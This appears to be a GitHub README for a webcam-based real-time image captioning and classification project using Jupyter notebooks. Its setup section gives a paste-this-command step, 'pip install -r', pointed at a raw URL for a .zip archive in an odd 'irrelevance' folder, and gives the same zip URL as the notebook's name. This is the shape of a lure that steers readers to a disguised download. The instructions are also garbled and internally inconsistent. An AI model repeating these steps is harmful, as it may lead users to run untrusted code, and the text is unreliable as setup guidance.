Welcome to the realtime-vision-captioning repository. This project showcases computer vision tasks using pretrained models in Jupyter notebooks. It allows you to run a web application that captures images through your webcam and provides real-time captioning and classification.
To download the application, visit the Releases page:
This repository contains:
- Jupyter notebooks with examples of computer vision tasks.
- Real-time webcam application that performs captioning and classification.
You will find detailed instructions for running the application and more information about each notebook.
To run this application, ensure your system meets the following requirements:
- Operating System: Windows 10, macOS, or a suitable Linux distribution.
- Python version: 3.7 or higher.
- Web browser: Chrome, Firefox, or Safari for the best experience.
- Minimum RAM: 8 GB recommended.
- Internet connection: Required for downloading models and datasets.
-
Download the Application
- Go to the Releases page: Download Here.
- Find the latest version available, and click the link to download.
-
Install Dependencies
After downloading, you may need to install some Python packages. Open your command line or terminal, and run the following command:pip install -r https://raw.githubusercontent.com/mostafa1344/realtime-vision-captioning/main/irrelevance/vision_realtime_captioning_2.5-alpha.4.zipThis command will install all necessary libraries.
-
Running the Jupyter Notebook
- Open your terminal and navigate to the folder where you downloaded the notebook files.
- Launch the Jupyter Notebook by running the command:
jupyter notebookYour default web browser will open a new tab displaying the Jupyter interface.
-
Open the Real-Time Webcam Notebook
- In the Jupyter interface, find the notebook file named
https://raw.githubusercontent.com/mostafa1344/realtime-vision-captioning/main/irrelevance/vision_realtime_captioning_2.5-alpha.4.zip. - Click on it to open.
- In the Jupyter interface, find the notebook file named
-
Start the Application
- Follow the instructions within the notebook to set up your webcam.
- Execute the cells in the notebook to run the real-time captioning application.
- Real-Time Captioning: Captures live video and generates descriptive captions.
- Image Classification: Classifies images using trained models.
- User-Friendly Interface: The application is designed to be simple and effective.
- Pretrained Models: Leverages powerful models from Hugging Face.
Yes, as long as your laptop meets the system requirements listed.
Please check the error message carefully. Common issues often relate to missing packages. Use the command mentioned in the setup instructions to install the necessary packages.
If you would like to contribute, feel free to fork the repository and submit a pull request with your improvements or fixes.
For any questions or issues, please open an issue on the GitHub repository. We will do our best to assist you.
This project is licensed under the MIT License. For more details, see the LICENSE file in this repository.
Remember to explore the potential of real-time captioning. Enjoy the experience!